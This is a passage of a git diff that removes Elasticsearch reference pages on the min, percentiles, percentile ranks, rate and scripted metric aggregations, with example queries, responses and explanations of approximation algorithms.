parameters. To use a stored script use the following syntax: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "aggs": { - "min_price": { - "min": { - "script": { - "id": "my_script", - "params": { - "field": "price" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales,stored_example_script] - -==== Value Script - -Let's say that the prices of the documents in our index are in USD, but we -would like to compute the min in EURO (and for the sake of this example, let's -say the conversion rate is 1.2). We can use a value script to apply the -conversion rate to every value before it is aggregated: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "aggs": { - "min_price_in_euros": { - "min": { - "field": "price", - "script": { - "source": "_value * params.conversion_rate", - "params": { - "conversion_rate": 1.2 - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -==== Missing value - -The `missing` parameter defines how documents that are missing a value should -be treated. By default they will be ignored but it is also possible to treat -them as if they had a value. - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "aggs": { - "grade_min": { - "min": { - "field": "grade", - "missing": 10 <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> Documents without a value in the `grade` field will fall into the same -bucket as documents that have the value `10`. - -[[search-aggregations-metrics-min-aggregation-histogram-fields]] -==== Histogram fields - -When `min` is computed on <>, the result of the aggregation is the minimum -of all elements in the `values` array. Note, that the `counts` array of the histogram is ignored. 
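Put differently, only the `values` arrays of the stored histograms participate in the result. A minimal Python sketch of that behaviour, using hypothetical histogram field contents (see the concrete index example below):

[source,python]
--------------------------------------------------
# Hypothetical pre-aggregated histogram fields from two documents.
docs = [
    {"values": [0.1, 0.2, 0.3, 0.4, 0.5], "counts": [3, 7, 23, 12, 6]},
    {"values": [0.2, 0.4, 0.6],           "counts": [8, 17, 8]},
]

# min over histogram fields considers only the values arrays; counts are ignored.
overall_min = min(v for doc in docs for v in doc["values"])
print(overall_min)  # 0.1
--------------------------------------------------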
- -For example, for the following index that stores pre-aggregated histograms with latency metrics for different networks: - -[source,console] --------------------------------------------------- -PUT metrics_index/_doc/1 -{ - "network.name" : "net-1", - "latency_histo" : { - "values" : [0.1, 0.2, 0.3, 0.4, 0.5], <1> - "counts" : [3, 7, 23, 12, 6] <2> - } -} - -PUT metrics_index/_doc/2 -{ - "network.name" : "net-2", - "latency_histo" : { - "values" : [0.1, 0.2, 0.3, 0.4, 0.5], <1> - "counts" : [8, 17, 8, 7, 6] <2> - } -} - -POST /metrics_index/_search?size=0 -{ - "aggs" : { - "min_latency" : { "min" : { "field" : "latency_histo" } } - } -} --------------------------------------------------- - -The `min` aggregation will return the minimum value of all histogram fields: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "min_latency": { - "value": 0.1 - } - } -} --------------------------------------------------- -// TESTRESPONSE[skip:test not setup] diff --git a/docs/reference/aggregations/metrics/percentile-aggregation.asciidoc b/docs/reference/aggregations/metrics/percentile-aggregation.asciidoc deleted file mode 100644 index 460d7c05906..00000000000 --- a/docs/reference/aggregations/metrics/percentile-aggregation.asciidoc +++ /dev/null @@ -1,371 +0,0 @@ -[[search-aggregations-metrics-percentile-aggregation]] -=== Percentiles aggregation -++++ -Percentiles -++++ - -A `multi-value` metrics aggregation that calculates one or more percentiles -over numeric values extracted from the aggregated documents. These values can be -generated by a provided script or extracted from specific numeric or -<> in the documents. - -Percentiles show the point at which a certain percentage of observed values -occur. For example, the 95th percentile is the value which is greater than 95% -of the observed values. - -Percentiles are often used to find outliers. In normal distributions, the -0.13th and 99.87th percentiles represents three standard deviations from the -mean. Any data which falls outside three standard deviations is often considered -an anomaly. - -When a range of percentiles are retrieved, they can be used to estimate the -data distribution and determine if the data is skewed, bimodal, etc. - -Assume your data consists of website load times. The average and median -load times are not overly useful to an administrator. The max may be interesting, -but it can be easily skewed by a single slow response. - -Let's look at a range of percentiles representing load time: - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "load_time_outlier": { - "percentiles": { - "field": "load_time" <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:latency] -<1> The field `load_time` must be a numeric field - -By default, the `percentile` metric will generate a range of -percentiles: `[ 1, 5, 25, 50, 75, 95, 99 ]`. The response will look like this: - -[source,console-result] --------------------------------------------------- -{ - ... 
- - "aggregations": { - "load_time_outlier": { - "values": { - "1.0": 5.0, - "5.0": 25.0, - "25.0": 165.0, - "50.0": 445.0, - "75.0": 725.0, - "95.0": 945.0, - "99.0": 985.0 - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -As you can see, the aggregation will return a calculated value for each percentile -in the default range. If we assume response times are in milliseconds, it is -immediately obvious that the webpage normally loads in 10-725ms, but occasionally -spikes to 945-985ms. - -Often, administrators are only interested in outliers -- the extreme percentiles. -We can specify just the percents we are interested in (requested percentiles -must be a value between 0-100 inclusive): - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "load_time_outlier": { - "percentiles": { - "field": "load_time", - "percents": [ 95, 99, 99.9 ] <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:latency] -<1> Use the `percents` parameter to specify particular percentiles to calculate - -==== Keyed Response - -By default the `keyed` flag is set to `true` which associates a unique string key with each bucket and returns the ranges as a hash rather than an array. Setting the `keyed` flag to `false` will disable this behavior: - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "load_time_outlier": { - "percentiles": { - "field": "load_time", - "keyed": false - } - } - } -} --------------------------------------------------- -// TEST[setup:latency] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - - "aggregations": { - "load_time_outlier": { - "values": [ - { - "key": 1.0, - "value": 5.0 - }, - { - "key": 5.0, - "value": 25.0 - }, - { - "key": 25.0, - "value": 165.0 - }, - { - "key": 50.0, - "value": 445.0 - }, - { - "key": 75.0, - "value": 725.0 - }, - { - "key": 95.0, - "value": 945.0 - }, - { - "key": 99.0, - "value": 985.0 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -==== Script - -The percentile metric supports scripting. For example, if our load times -are in milliseconds but we want percentiles calculated in seconds, we could use -a script to convert them on-the-fly: - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "load_time_outlier": { - "percentiles": { - "script": { - "lang": "painless", - "source": "doc['load_time'].value / params.timeUnit", <1> - "params": { - "timeUnit": 1000 <2> - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:latency] - -<1> The `field` parameter is replaced with a `script` parameter, which uses the -script to generate values which percentiles are calculated on -<2> Scripting supports parameterized input just like any other script - -This will interpret the `script` parameter as an `inline` script with the `painless` script language and no script parameters. 
To use a stored script use the following syntax: - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "load_time_outlier": { - "percentiles": { - "script": { - "id": "my_script", - "params": { - "field": "load_time" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:latency,stored_example_script] - -[[search-aggregations-metrics-percentile-aggregation-approximation]] -==== Percentiles are (usually) approximate - -There are many different algorithms to calculate percentiles. The naive -implementation simply stores all the values in a sorted array. To find the 50th -percentile, you simply find the value that is at `my_array[count(my_array) * 0.5]`. - -Clearly, the naive implementation does not scale -- the sorted array grows -linearly with the number of values in your dataset. To calculate percentiles -across potentially billions of values in an Elasticsearch cluster, _approximate_ -percentiles are calculated. - -The algorithm used by the `percentile` metric is called TDigest (introduced by -Ted Dunning in -https://github.com/tdunning/t-digest/blob/master/docs/t-digest-paper/histo.pdf[Computing Accurate Quantiles using T-Digests]). - -When using this metric, there are a few guidelines to keep in mind: - -- Accuracy is proportional to `q(1-q)`. This means that extreme percentiles (e.g. 99%) -are more accurate than less extreme percentiles, such as the median -- For small sets of values, percentiles are highly accurate (and potentially -100% accurate if the data is small enough). -- As the quantity of values in a bucket grows, the algorithm begins to approximate -the percentiles. It is effectively trading accuracy for memory savings. The -exact level of inaccuracy is difficult to generalize, since it depends on your -data distribution and volume of data being aggregated - -The following chart shows the relative error on a uniform distribution depending -on the number of collected values and the requested percentile: - -image:images/percentiles_error.png[] - -It shows how precision is better for extreme percentiles. The reason why error diminishes -for large number of values is that the law of large numbers makes the distribution of -values more and more uniform and the t-digest tree can do a better job at summarizing -it. It would not be the case on more skewed distributions. - -[WARNING] -==== -Percentile aggregations are also -{wikipedia}/Nondeterministic_algorithm[non-deterministic]. -This means you can get slightly different results using the same data. -==== - -[[search-aggregations-metrics-percentile-aggregation-compression]] -==== Compression - -Approximate algorithms must balance memory utilization with estimation accuracy. -This balance can be controlled using a `compression` parameter: - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "load_time_outlier": { - "percentiles": { - "field": "load_time", - "tdigest": { - "compression": 200 <1> - } - } - } - } -} --------------------------------------------------- -// TEST[setup:latency] - -<1> Compression controls memory usage and approximation error - -// tag::t-digest[] -The TDigest algorithm uses a number of "nodes" to approximate percentiles -- the -more nodes available, the higher the accuracy (and large memory footprint) proportional -to the volume of data. The `compression` parameter limits the maximum number of -nodes to `20 * compression`. 
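Combined with the per-node size mentioned just below (roughly 32 bytes per node), this bound yields a simple back-of-the-envelope estimate of the worst-case digest size. The Python sketch below is only an estimate based on those two figures, not an exact accounting of the implementation:

[source,python]
--------------------------------------------------
# Rough worst-case TDigest size: at most 20 * compression nodes at ~32 bytes each.
def worst_case_tdigest_bytes(compression, bytes_per_node=32):
    return 20 * compression * bytes_per_node

for compression in (100, 200, 1000):
    kb = worst_case_tdigest_bytes(compression) / 1000
    print(f"compression={compression}: ~{kb:.0f} KB worst case")
# compression=100 (the default) comes out to roughly 64 KB, matching the text below.
--------------------------------------------------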
- -Therefore, by increasing the compression value, you can increase the accuracy of -your percentiles at the cost of more memory. Larger compression values also -make the algorithm slower since the underlying tree data structure grows in size, -resulting in more expensive operations. The default compression value is -`100`. - -A "node" uses roughly 32 bytes of memory, so under worst-case scenarios (large amount -of data which arrives sorted and in-order) the default settings will produce a -TDigest roughly 64KB in size. In practice data tends to be more random and -the TDigest will use less memory. -// end::t-digest[] - -==== HDR Histogram - -NOTE: This setting exposes the internal implementation of HDR Histogram and the syntax may change in the future. - -https://github.com/HdrHistogram/HdrHistogram[HDR Histogram] (High Dynamic Range Histogram) is an alternative implementation -that can be useful when calculating percentiles for latency measurements as it can be faster than the t-digest implementation -with the trade-off of a larger memory footprint. This implementation maintains a fixed worse-case percentage error (specified -as a number of significant digits). This means that if data is recorded with values from 1 microsecond up to 1 hour -(3,600,000,000 microseconds) in a histogram set to 3 significant digits, it will maintain a value resolution of 1 microsecond -for values up to 1 millisecond and 3.6 seconds (or better) for the maximum tracked value (1 hour). - -The HDR Histogram can be used by specifying the `method` parameter in the request: - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "load_time_outlier": { - "percentiles": { - "field": "load_time", - "percents": [ 95, 99, 99.9 ], - "hdr": { <1> - "number_of_significant_value_digits": 3 <2> - } - } - } - } -} --------------------------------------------------- -// TEST[setup:latency] - -<1> `hdr` object indicates that HDR Histogram should be used to calculate the percentiles and specific settings for this algorithm can be specified inside the object -<2> `number_of_significant_value_digits` specifies the resolution of values for the histogram in number of significant digits - -The HDRHistogram only supports positive values and will error if it is passed a negative value. It is also not a good idea to use -the HDRHistogram if the range of values is unknown as this could lead to high memory usage. - -==== Missing value - -The `missing` parameter defines how documents that are missing a value should be treated. -By default they will be ignored but it is also possible to treat them as if they -had a value. - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "grade_percentiles": { - "percentiles": { - "field": "grade", - "missing": 10 <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:latency] - -<1> Documents without a value in the `grade` field will fall into the same bucket as documents that have the value `10`. 
diff --git a/docs/reference/aggregations/metrics/percentile-rank-aggregation.asciidoc b/docs/reference/aggregations/metrics/percentile-rank-aggregation.asciidoc deleted file mode 100644 index 6a76226fde3..00000000000 --- a/docs/reference/aggregations/metrics/percentile-rank-aggregation.asciidoc +++ /dev/null @@ -1,241 +0,0 @@ -[[search-aggregations-metrics-percentile-rank-aggregation]] -=== Percentile ranks aggregation -++++ -Percentile ranks -++++ - -A `multi-value` metrics aggregation that calculates one or more percentile ranks -over numeric values extracted from the aggregated documents. These values can be -generated by a provided script or extracted from specific numeric or -<> in the documents. - -[NOTE] -================================================== -Please see <> -and <> for advice -regarding approximation and memory use of the percentile ranks aggregation -================================================== - -Percentile rank show the percentage of observed values which are below certain -value. For example, if a value is greater than or equal to 95% of the observed values -it is said to be at the 95th percentile rank. - -Assume your data consists of website load times. You may have a service agreement that -95% of page loads complete within 500ms and 99% of page loads complete within 600ms. - -Let's look at a range of percentiles representing load time: - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "load_time_ranks": { - "percentile_ranks": { - "field": "load_time", <1> - "values": [ 500, 600 ] - } - } - } -} --------------------------------------------------- -// TEST[setup:latency] - -<1> The field `load_time` must be a numeric field - -The response will look like this: - -[source,console-result] --------------------------------------------------- -{ - ... - - "aggregations": { - "load_time_ranks": { - "values": { - "500.0": 90.01, - "600.0": 100.0 - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] -// TESTRESPONSE[s/"500.0": 90.01/"500.0": 55.00000000000001/] -// TESTRESPONSE[s/"600.0": 100.0/"600.0": 64.0/] - -From this information you can determine you are hitting the 99% load time target but not quite -hitting the 95% load time target - -==== Keyed Response - -By default the `keyed` flag is set to `true` associates a unique string key with each bucket and returns the ranges as a hash rather than an array. Setting the `keyed` flag to `false` will disable this behavior: - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "load_time_ranks": { - "percentile_ranks": { - "field": "load_time", - "values": [ 500, 600 ], - "keyed": false - } - } - } -} --------------------------------------------------- -// TEST[setup:latency] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... 
- - "aggregations": { - "load_time_ranks": { - "values": [ - { - "key": 500.0, - "value": 90.01 - }, - { - "key": 600.0, - "value": 100.0 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] -// TESTRESPONSE[s/"value": 90.01/"value": 55.00000000000001/] -// TESTRESPONSE[s/"value": 100.0/"value": 64.0/] - - -==== Script - -The percentile rank metric supports scripting. For example, if our load times -are in milliseconds but we want to specify values in seconds, we could use -a script to convert them on-the-fly: - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "load_time_ranks": { - "percentile_ranks": { - "values": [ 500, 600 ], - "script": { - "lang": "painless", - "source": "doc['load_time'].value / params.timeUnit", <1> - "params": { - "timeUnit": 1000 <2> - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:latency] - -<1> The `field` parameter is replaced with a `script` parameter, which uses the -script to generate values which percentile ranks are calculated on -<2> Scripting supports parameterized input just like any other script - -This will interpret the `script` parameter as an `inline` script with the `painless` script language and no script parameters. To use a stored script use the following syntax: - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "load_time_ranks": { - "percentile_ranks": { - "values": [ 500, 600 ], - "script": { - "id": "my_script", - "params": { - "field": "load_time" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:latency,stored_example_script] - -==== HDR Histogram - -NOTE: This setting exposes the internal implementation of HDR Histogram and the syntax may change in the future. - -https://github.com/HdrHistogram/HdrHistogram[HDR Histogram] (High Dynamic Range Histogram) is an alternative implementation -that can be useful when calculating percentile ranks for latency measurements as it can be faster than the t-digest implementation -with the trade-off of a larger memory footprint. This implementation maintains a fixed worse-case percentage error (specified as a -number of significant digits). This means that if data is recorded with values from 1 microsecond up to 1 hour (3,600,000,000 -microseconds) in a histogram set to 3 significant digits, it will maintain a value resolution of 1 microsecond for values up to -1 millisecond and 3.6 seconds (or better) for the maximum tracked value (1 hour). 
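As a rough rule of thumb, the worst-case value resolution at a given recorded value is on the order of the value divided by 10 to the power of `number_of_significant_value_digits`. The Python sketch below reproduces the figures quoted above; it approximates the guarantee rather than the exact HdrHistogram bucketing logic:

[source,python]
--------------------------------------------------
# Approximate worst-case resolution of an HDR histogram for a given number of
# significant value digits. Values are in microseconds, as in the example above.
def approx_resolution(value, significant_digits):
    return value / 10 ** significant_digits

MICROS_PER_HOUR = 3_600_000_000
print(approx_resolution(1_000, 3))            # 1.0       -> ~1 microsecond at 1 millisecond
print(approx_resolution(MICROS_PER_HOUR, 3))  # 3600000.0 -> ~3.6 seconds at 1 hour
--------------------------------------------------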
- -The HDR Histogram can be used by specifying the `hdr` object in the request: - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "load_time_ranks": { - "percentile_ranks": { - "field": "load_time", - "values": [ 500, 600 ], - "hdr": { <1> - "number_of_significant_value_digits": 3 <2> - } - } - } - } -} --------------------------------------------------- -// TEST[setup:latency] - -<1> `hdr` object indicates that HDR Histogram should be used to calculate the percentiles and specific settings for this algorithm can be specified inside the object -<2> `number_of_significant_value_digits` specifies the resolution of values for the histogram in number of significant digits - -The HDRHistogram only supports positive values and will error if it is passed a negative value. It is also not a good idea to use -the HDRHistogram if the range of values is unknown as this could lead to high memory usage. - -==== Missing value - -The `missing` parameter defines how documents that are missing a value should be treated. -By default they will be ignored but it is also possible to treat them as if they -had a value. - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "load_time_ranks": { - "percentile_ranks": { - "field": "load_time", - "values": [ 500, 600 ], - "missing": 10 <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:latency] - -<1> Documents without a value in the `load_time` field will fall into the same bucket as documents that have the value `10`. diff --git a/docs/reference/aggregations/metrics/rate-aggregation.asciidoc b/docs/reference/aggregations/metrics/rate-aggregation.asciidoc deleted file mode 100644 index 48d9a26bbdc..00000000000 --- a/docs/reference/aggregations/metrics/rate-aggregation.asciidoc +++ /dev/null @@ -1,260 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[search-aggregations-metrics-rate-aggregation]] -=== Rate aggregation -++++ -Rate -++++ - -A `rate` metrics aggregation can be used only inside a `date_histogram` and calculates a rate of documents or a field in each -`date_histogram` bucket. - -==== Syntax - -A `rate` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "rate": { - "unit": "month", - "field": "requests" - } -} --------------------------------------------------- -// NOTCONSOLE - -The following request will group all sales records into monthly bucket and than convert the number of sales transaction in each bucket -into per annual sales rate. - -[source,console] --------------------------------------------------- -GET sales/_search -{ - "size": 0, - "aggs": { - "by_date": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" <1> - }, - "aggs": { - "my_rate": { - "rate": { - "unit": "year" <2> - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -<1> Histogram is grouped by month. -<2> But the rate is converted into annual rate. - -The response will return the annual rate of transaction in each bucket. Since there are 12 months per year, the annual rate will -be automatically calculated by multiplying monthly rate by 12. - -[source,console-result] --------------------------------------------------- -{ - ... 
- "aggregations" : { - "by_date" : { - "buckets" : [ - { - "key_as_string" : "2015/01/01 00:00:00", - "key" : 1420070400000, - "doc_count" : 3, - "my_rate" : { - "value" : 36.0 - } - }, - { - "key_as_string" : "2015/02/01 00:00:00", - "key" : 1422748800000, - "doc_count" : 2, - "my_rate" : { - "value" : 24.0 - } - }, - { - "key_as_string" : "2015/03/01 00:00:00", - "key" : 1425168000000, - "doc_count" : 2, - "my_rate" : { - "value" : 24.0 - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -Instead of counting the number of documents, it is also possible to calculate a sum of all values of the fields in the documents in each -bucket. The following request will group all sales records into monthly bucket and than calculate the total monthly sales and convert them -into average daily sales. - -[source,console] --------------------------------------------------- -GET sales/_search -{ - "size": 0, - "aggs": { - "by_date": { - "date_histogram": { - "field": "date", - "calendar_interval": "month" <1> - }, - "aggs": { - "avg_price": { - "rate": { - "field": "price", <2> - "unit": "day" <3> - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -<1> Histogram is grouped by month. -<2> Calculate sum of all sale prices -<3> Convert to average daily sales - -The response will contain the average daily sale prices for each month. - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations" : { - "by_date" : { - "buckets" : [ - { - "key_as_string" : "2015/01/01 00:00:00", - "key" : 1420070400000, - "doc_count" : 3, - "avg_price" : { - "value" : 17.741935483870968 - } - }, - { - "key_as_string" : "2015/02/01 00:00:00", - "key" : 1422748800000, - "doc_count" : 2, - "avg_price" : { - "value" : 2.142857142857143 - } - }, - { - "key_as_string" : "2015/03/01 00:00:00", - "key" : 1425168000000, - "doc_count" : 2, - "avg_price" : { - "value" : 12.096774193548388 - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - - -==== Relationship between bucket sizes and rate - -The `rate` aggregation supports all rate that can be used <> of `date_histogram` -aggregation. The specified rate should compatible with the `date_histogram` aggregation interval, i.e. it should be possible to -convert the bucket size into the rate. By default the interval of the `date_histogram` is used. - -`"rate": "second"`:: compatible with all intervals -`"rate": "minute"`:: compatible with all intervals -`"rate": "hour"`:: compatible with all intervals -`"rate": "day"`:: compatible with all intervals -`"rate": "week"`:: compatible with all intervals -`"rate": "month"`:: compatible with only with `month`, `quarter` and `year` calendar intervals -`"rate": "quarter"`:: compatible with only with `month`, `quarter` and `year` calendar intervals -`"rate": "year"`:: compatible with only with `month`, `quarter` and `year` calendar intervals - -==== Script - -The `rate` aggregation also supports scripting. 
For example, if we need to adjust our prices before calculating rates, we could use
-a script to recalculate them on-the-fly:
-
-[source,console]
---------------------------------------------------
-GET sales/_search
-{
-  "size": 0,
-  "aggs": {
-    "by_date": {
-      "date_histogram": {
-        "field": "date",
-        "calendar_interval": "month"
-      },
-      "aggs": {
-        "avg_price": {
-          "rate": {
-            "script": {  <1>
-              "lang": "painless",
-              "source": "doc['price'].value * params.adjustment",
-              "params": {
-                "adjustment": 0.9  <2>
-              }
-            }
-          }
-        }
-      }
-    }
-  }
-}
---------------------------------------------------
-// TEST[setup:sales]
-
-<1> The `field` parameter is replaced with a `script` parameter, which uses the
-script to generate the values that the rate is calculated on.
-<2> Scripting supports parameterized input just like any other script.
-
-[source,console-result]
---------------------------------------------------
-{
-  ...
-  "aggregations" : {
-    "by_date" : {
-      "buckets" : [
-        {
-          "key_as_string" : "2015/01/01 00:00:00",
-          "key" : 1420070400000,
-          "doc_count" : 3,
-          "avg_price" : {
-            "value" : 495.0
-          }
-        },
-        {
-          "key_as_string" : "2015/02/01 00:00:00",
-          "key" : 1422748800000,
-          "doc_count" : 2,
-          "avg_price" : {
-            "value" : 54.0
-          }
-        },
-        {
-          "key_as_string" : "2015/03/01 00:00:00",
-          "key" : 1425168000000,
-          "doc_count" : 2,
-          "avg_price" : {
-            "value" : 337.5
-          }
-        }
-      ]
-    }
-  }
-}
---------------------------------------------------
-// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/]
diff --git a/docs/reference/aggregations/metrics/scripted-metric-aggregation.asciidoc b/docs/reference/aggregations/metrics/scripted-metric-aggregation.asciidoc
deleted file mode 100644
index 2bedcd4698b..00000000000
--- a/docs/reference/aggregations/metrics/scripted-metric-aggregation.asciidoc
+++ /dev/null
@@ -1,286 +0,0 @@
-[[search-aggregations-metrics-scripted-metric-aggregation]]
-=== Scripted metric aggregation
-++++
-Scripted metric
-++++
-
-A metric aggregation that executes using scripts to provide a metric output.
-
-WARNING: Using scripts can result in slower search speeds. See
-<>.
-
-Example:
-
-[source,console]
---------------------------------------------------
-POST ledger/_search?size=0
-{
-  "query": {
-    "match_all": {}
-  },
-  "aggs": {
-    "profit": {
-      "scripted_metric": {
-        "init_script": "state.transactions = []", <1>
-        "map_script": "state.transactions.add(doc.type.value == 'sale' ? doc.amount.value : -1 * doc.amount.value)",
-        "combine_script": "double profit = 0; for (t in state.transactions) { profit += t } return profit",
-        "reduce_script": "double profit = 0; for (a in states) { profit += a } return profit"
-      }
-    }
-  }
-}
---------------------------------------------------
-// TEST[setup:ledger]
-
-<1> `init_script` is an optional parameter; all other scripts are required.
-
-The above aggregation demonstrates how one would use the scripted metric aggregation to compute the total profit from sale and cost transactions.
-
-The response for the above aggregation:
-
-[source,console-result]
---------------------------------------------------
-{
-  "took": 218,
-  ...
- "aggregations": { - "profit": { - "value": 240.0 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 218/"took": $body.took/] -// TESTRESPONSE[s/\.\.\./"_shards": $body._shards, "hits": $body.hits, "timed_out": false,/] - -The above example can also be specified using stored scripts as follows: - -[source,console] --------------------------------------------------- -POST ledger/_search?size=0 -{ - "aggs": { - "profit": { - "scripted_metric": { - "init_script": { - "id": "my_init_script" - }, - "map_script": { - "id": "my_map_script" - }, - "combine_script": { - "id": "my_combine_script" - }, - "params": { - "field": "amount" <1> - }, - "reduce_script": { - "id": "my_reduce_script" - } - } - } - } -} --------------------------------------------------- -// TEST[setup:ledger,stored_scripted_metric_script] - -<1> script parameters for `init`, `map` and `combine` scripts must be specified -in a global `params` object so that it can be shared between the scripts. - -//// -Verify this response as well but in a hidden block. - -[source,console-result] --------------------------------------------------- -{ - "took": 218, - ... - "aggregations": { - "profit": { - "value": 240.0 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 218/"took": $body.took/] -// TESTRESPONSE[s/\.\.\./"_shards": $body._shards, "hits": $body.hits, "timed_out": false,/] -//// - -For more details on specifying scripts see <>. - -[[scripted-metric-aggregation-return-types]] -==== Allowed return types - -Whilst any valid script object can be used within a single script, the scripts must return or store in the `state` object only the following types: - -* primitive types -* String -* Map (containing only keys and values of the types listed here) -* Array (containing elements of only the types listed here) - -[[scripted-metric-aggregation-scope]] -==== Scope of scripts - -The scripted metric aggregation uses scripts at 4 stages of its execution: - -init_script:: Executed prior to any collection of documents. Allows the aggregation to set up any initial state. -+ -In the above example, the `init_script` creates an array `transactions` in the `state` object. - -map_script:: Executed once per document collected. This is a required script. If no combine_script is specified, the resulting state - needs to be stored in the `state` object. -+ -In the above example, the `map_script` checks the value of the type field. If the value is 'sale' the value of the amount field -is added to the transactions array. If the value of the type field is not 'sale' the negated value of the amount field is added -to transactions. - -combine_script:: Executed once on each shard after document collection is complete. This is a required script. Allows the aggregation to - consolidate the state returned from each shard. -+ -In the above example, the `combine_script` iterates through all the stored transactions, summing the values in the `profit` variable -and finally returns `profit`. - -reduce_script:: Executed once on the coordinating node after all shards have returned their results. This is a required script. The - script is provided with access to a variable `states` which is an array of the result of the combine_script on each - shard. -+ -In the above example, the `reduce_script` iterates through the `profit` returned by each shard summing the values before returning the -final combined profit which will be returned in the response of the aggregation. 
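-
-To make the mapping from stage to script concrete, here is the profit example from the top of
-this page again as a single annotated sketch. The Painless sources are the same as in the example
-above; only the comments mapping each script to its stage are new:
-
-[source,painless]
---------------------------------------------------
-// init_script: runs once per shard, before any documents are collected
-state.transactions = []
-
-// map_script: runs once per collected document on each shard
-state.transactions.add(doc.type.value == 'sale' ? doc.amount.value : -1 * doc.amount.value)
-
-// combine_script: runs once per shard after collection and returns the shard-level result
-double profit = 0;
-for (t in state.transactions) { profit += t }
-return profit
-
-// reduce_script: runs once on the coordinating node; `states` holds one combine result per shard
-double profit = 0;
-for (a in states) { profit += a }
-return profit
---------------------------------------------------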
- -[[scripted-metric-aggregation-example]] -==== Worked example - -Imagine a situation where you index the following documents into an index with 2 shards: - -[source,console] --------------------------------------------------- -PUT /transactions/_bulk?refresh -{"index":{"_id":1}} -{"type": "sale","amount": 80} -{"index":{"_id":2}} -{"type": "cost","amount": 10} -{"index":{"_id":3}} -{"type": "cost","amount": 30} -{"index":{"_id":4}} -{"type": "sale","amount": 130} --------------------------------------------------- - -Lets say that documents 1 and 3 end up on shard A and documents 2 and 4 end up on shard B. The following is a breakdown of what the aggregation result is -at each stage of the example above. - -===== Before init_script - -`state` is initialized as a new empty object. - -[source,js] --------------------------------------------------- -"state" : {} --------------------------------------------------- -// NOTCONSOLE - -===== After init_script - -This is run once on each shard before any document collection is performed, and so we will have a copy on each shard: - -Shard A:: -+ -[source,js] --------------------------------------------------- -"state" : { - "transactions" : [] -} --------------------------------------------------- -// NOTCONSOLE - -Shard B:: -+ -[source,js] --------------------------------------------------- -"state" : { - "transactions" : [] -} --------------------------------------------------- -// NOTCONSOLE - -===== After map_script - -Each shard collects its documents and runs the map_script on each document that is collected: - -Shard A:: -+ -[source,js] --------------------------------------------------- -"state" : { - "transactions" : [ 80, -30 ] -} --------------------------------------------------- -// NOTCONSOLE - -Shard B:: -+ -[source,js] --------------------------------------------------- -"state" : { - "transactions" : [ -10, 130 ] -} --------------------------------------------------- -// NOTCONSOLE - -===== After combine_script - -The combine_script is executed on each shard after document collection is complete and reduces all the transactions down to a single profit figure for each -shard (by summing the values in the transactions array) which is passed back to the coordinating node: - -Shard A:: 50 -Shard B:: 120 - -===== After reduce_script - -The reduce_script receives a `states` array containing the result of the combine script for each shard: - -[source,js] --------------------------------------------------- -"states" : [ - 50, - 120 -] --------------------------------------------------- -// NOTCONSOLE - -It reduces the responses for the shards down to a final overall profit figure (by summing the values) and returns this as the result of the aggregation to -produce the response: - -[source,js] --------------------------------------------------- -{ - ... - - "aggregations": { - "profit": { - "value": 170 - } - } -} --------------------------------------------------- -// NOTCONSOLE - 